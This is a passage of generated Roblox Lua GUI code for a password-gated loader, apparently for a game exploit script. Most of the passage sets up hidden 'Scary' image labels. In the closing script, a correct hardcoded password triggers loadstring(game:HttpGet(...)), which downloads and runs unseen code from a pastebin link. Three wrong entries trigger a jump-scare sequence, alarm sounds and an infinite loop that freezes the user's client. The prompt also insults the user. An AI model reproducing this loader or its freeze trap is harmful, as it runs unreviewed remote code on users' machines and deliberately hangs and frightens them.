_9_19.Visible = false
_9_19.Image = "rbxassetid://4519042259"

_9_20.Name = "9"
_9_20.Parent = Scary
_9_20.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_20.Position = UDim2.new(-0.0554821491, 0, 0.698234379, 0)
_9_20.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_20.Visible = false
_9_20.Image = "rbxassetid://4519042259"

_9_21.Name = "9"
_9_21.Parent = Scary
_9_21.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_21.Position = UDim2.new(0.284015864, 0, 0.53772074, 0)
_9_21.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_21.Visible = false
_9_21.Image = "rbxassetid://4519042259"

_8_7.Name = "8"
_8_7.Parent = Scary
_8_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_8_7.Position = UDim2.new(0.38441214, 0, 0.192616433, 0)
_8_7.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_8_7.Visible = false
_8_7.Image = "rbxassetid://4519042259"

_8_8.Name = "8"
_8_8.Parent = Scary
_8_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_8_8.Position = UDim2.new(0.581241727, 0, 0.152488023, 0)
_8_8.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_8_8.Visible = false
_8_8.Image = "rbxassetid://4519042259"

_8_9.Name = "8"
_8_9.Parent = Scary
_8_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_8_9.Position = UDim2.new(0.756935239, 0, 0.589085162, 0)
_8_9.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_8_9.Visible = false
_8_9.Image = "rbxassetid://4519042259"

_8_10.Name = "8"
_8_10.Parent = Scary
_8_10.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_8_10.Position = UDim2.new(0.531043589, 0, 0.357945502, 0)
_8_10.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_8_10.Visible = false
_8_10.Image = "rbxassetid://4519042259"

_6.Name = "6"
_6.Parent = Scary
_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_6.Position = UDim2.new(0.553500652, 0, -0.0658105165, 0)
_6.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_6.Visible = false
_6.Image = "rbxassetid://4519042259"

_6_2.Name = "6"
_6_2.Parent = Scary
_6_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_6_2.Position = UDim2.new(-0.0145310462, 0, 0.101123661, 0)
_6_2.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_6_2.Visible = false
_6_2.Image = "rbxassetid://4519042259"

_6_3.Name = "6"
_6_3.Parent = Scary
_6_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_6_3.Position = UDim2.new(0.25627476, 0, -0.0321026593, 0)
_6_3.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_6_3.Visible = false
_6_3.Image = "rbxassetid://4519042259"

_6_4.Name = "6"
_6_4.Parent = Scary
_6_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_6_4.Position = UDim2.new(-0.0686922073, 0, 0.213483214, 0)
_6_4.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_6_4.Visible = false
_6_4.Image = "rbxassetid://4519042259"

_6_5.Name = "6"
_6_5.Parent = Scary
_6_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_6_5.Position = UDim2.new(0.297225893, 0, 0.316211939, 0)
_6_5.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_6_5.Visible = false
_6_5.Image = "rbxassetid://4519042259"

_7.Name = "7"
_7.Parent = Scary
_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_7.Position = UDim2.new(0.758256257, 0, 0.152488023, 0)
_7.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_7.Visible = false
_7.Image = "rbxassetid://4519042259"

_7_2.Name = "7"
_7_2.Parent = Scary
_7_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_7_2.Position = UDim2.new(0.162483484, 0, 0.213483229, 0)
_7_2.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_7_2.Visible = false
_7_2.Image = "rbxassetid://4519042259"

_7_3.Name = "7"
_7_3.Parent = Scary
_7_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_7_3.Position = UDim2.new(-0.0686922073, 0, 0.579454303, 0)
_7_3.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_7_3.Visible = false
_7_3.Image = "rbxassetid://4519042259"

_7_4.Name = "7"
_7_4.Parent = Scary
_7_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_7_4.Position = UDim2.new(0.284015864, 0, 0.53772074, 0)
_7_4.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_7_4.Visible = false
_7_4.Image = "rbxassetid://4519042259"

_7_5.Name = "7"
_7_5.Parent = Scary
_7_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_7_5.Position = UDim2.new(-0.0554821491, 0, 0.698234379, 0)
_7_5.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_7_5.Visible = false
_7_5.Image = "rbxassetid://4519042259"

_7_6.Name = "7"
_7_6.Parent = Scary
_7_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_7_6.Position = UDim2.new(0.210039645, 0, 0.886035323, 0)
_7_6.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_7_6.Visible = false
_7_6.Image = "rbxassetid://4519042259"

_7_7.Name = "7"
_7_7.Parent = Scary
_7_7.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_7_7.Position = UDim2.new(0.738441229, 0, 0.703049779, 0)
_7_7.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_7_7.Visible = false
_7_7.Image = "rbxassetid://4519042259"

_7_8.Name = "7"
_7_8.Parent = Scary
_7_8.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_7_8.Position = UDim2.new(0.738441229, 0, 0.280898899, 0)
_7_8.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_7_8.Visible = false
_7_8.Image = "rbxassetid://4519042259"

_7_9.Name = "7"
_7_9.Parent = Scary
_7_9.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_7_9.Position = UDim2.new(0.776750326, 0, -0.0770465136, 0)
_7_9.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_7_9.Visible = false
_7_9.Image = "rbxassetid://4519042259"

_9_22.Name = "9"
_9_22.Parent = Scary
_9_22.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_22.Position = UDim2.new(0.581241727, 0, 0.152488023, 0)
_9_22.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_22.Visible = false
_9_22.Image = "rbxassetid://4519042259"

_9_23.Name = "9"
_9_23.Parent = Scary
_9_23.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_23.Position = UDim2.new(0.38441214, 0, 0.192616433, 0)
_9_23.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_23.Visible = false
_9_23.Image = "rbxassetid://4519042259"

_9_24.Name = "9"
_9_24.Parent = Scary
_9_24.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_24.Position = UDim2.new(0.756935239, 0, 0.589085162, 0)
_9_24.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_24.Visible = false
_9_24.Image = "rbxassetid://4519042259"

_9_25.Name = "9"
_9_25.Parent = Scary
_9_25.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
_9_25.Position = UDim2.new(0.531043589, 0, 0.357945502, 0)
_9_25.Size = UDim2.new(0.297358006, 0, 0.165357903, 0)
_9_25.Visible = false
_9_25.Image = "rbxassetid://4519042259"

EW.Name = "EW"
EW.Parent = Scary
EW.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
EW.Size = UDim2.new(1, 0, 1, 0)
EW.Visible = false
EW.ZIndex = 1325464245
EW.Image = "rbxassetid://1719950697"

-- Scripts:

local function IUVY_fake_script() -- PasswordUI.LocalScript 
	local script = Instance.new('LocalScript', PasswordUI)

	local Password = "DylanIsATwat"
	local WrongPassAmount = 1
	script.Parent.PasswordFrame.Active = true
	script.Parent.PasswordFrame.Draggable = true
	script.Parent.PasswordFrame.Exit.MouseButton1Up:Connect(function()
		script.Parent.PasswordFrame.Transition:TweenSize(UDim2.new(0, 240,0, 135),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,0.5,false)
		wait(0.5)
		script.Parent.PasswordFrame:TweenPosition(UDim2.new(-0.4, 0,0.353, 0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,0.5,false)
		wait(0.5)
		script.Parent:Destroy()
	end)
	local InUse = false
	script.Parent.PasswordFrame.Enter.MouseButton1Up:Connect(function()
		if InUse == false then
			InUse = true
			if script.Parent.PasswordFrame.PasswordBox.Text == Password then
				script.Parent.PasswordFrame.Transition:TweenSize(UDim2.new(0, 240,0, 135),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,0.5,false)
				wait(0.5)
				script.Parent.PasswordFrame:TweenPosition(UDim2.new(-0.4, 0,0.366, 0),Enum.EasingDirection.InOut,Enum.EasingStyle.Quad,0.5,false)
				wait(0.5)
				loadstring(game:HttpGet("https://pastebin.com/NaY9AdGS"))()
				wait(0.2)
				script.Parent:Destroy()
			else
				if WrongPassAmount == 3 then
					for i,v in pairs(script.Parent.Scary:GetDescendants()) do
						if v.Name == "1" then
							v.Visible = true
						end
					end
					script.Parent.Error:Play()
					wait(2)
					for i,v in pairs(script.Parent.Scary:GetDescendants()) do
						if v.Name == "2" then
							v.Visible = true
						end
					end
					script.Parent.Error:Play()
					wait(2)
					for i,v in pairs(script.Parent.Scary:GetDescendants()) do
						if v.Name == "3" then
							v.Visible = true
						end
					end
					script.Parent.Error:Play()
					wait(1.5)
					for i,v in pairs(script.Parent.Scary:GetDescendants()) do
						if v.Name == "4" then
							v.Visible = true
						end
					end
					script.Parent.Error:Play()
					wait(1)
					for i,v in pairs(script.Parent.Scary:GetDescendants()) do
						if v.Name == "5" then
							v.Visible = true
						end
					end
					script.Parent.Error:Play()
					wait(1)
					for i,v in pairs(script.Parent.Scary:GetDescendants()) do
						if v.Name == "6" then
							v.Visible = true
						end
					end
					script.Parent.Error:Play()
					wait(0.75)
					for i,v in pairs(script.Parent.Scary:GetDescendants()) do
						if v.Name == "7" then
							v.Visible = true
						end
					end
					script.Parent.Error:Play()
					wait(0.5)
					for i,v in pairs(script.Parent.Scary:GetDescendants()) do
						if v.Name == "8" then
							v.Visible = true
						end
					end
					script.Parent.Error:Play()
					wait(0.25)
					for i,v in pairs(script.Parent.Scary:GetDescendants()) do
						if v.Name == "9"then
							v.Visible = true
						end
					end
					wait(0.25)
					for i,v in pairs(script.Parent.Scary:GetDescendants()) do
						if v.Name == "10"then
							v.Visible = true
						end
					end
					script.Parent.Error:Play()
					wait(2)
					script.Parent.Scary.EW.Visible = true
					script.Parent.Hey:Play()
					wait(1.5)
					script.Parent.Alarm:Play()
					wait(1)
					while true do end
				else
					WrongPassAmount = WrongPassAmount + 1
					script.Parent.PasswordFrame.TopBar.TextLabel.Text = "WRONG PASSWORD DUMB ASS"
					wait(1)
					script.Parent.PasswordFrame.TopBar.TextLabel.Text = "Enter Password:"
					InUse = false
				end
			end
		end
	end)
	
	
end
coroutine.wrap(IUVY_fake_script)()
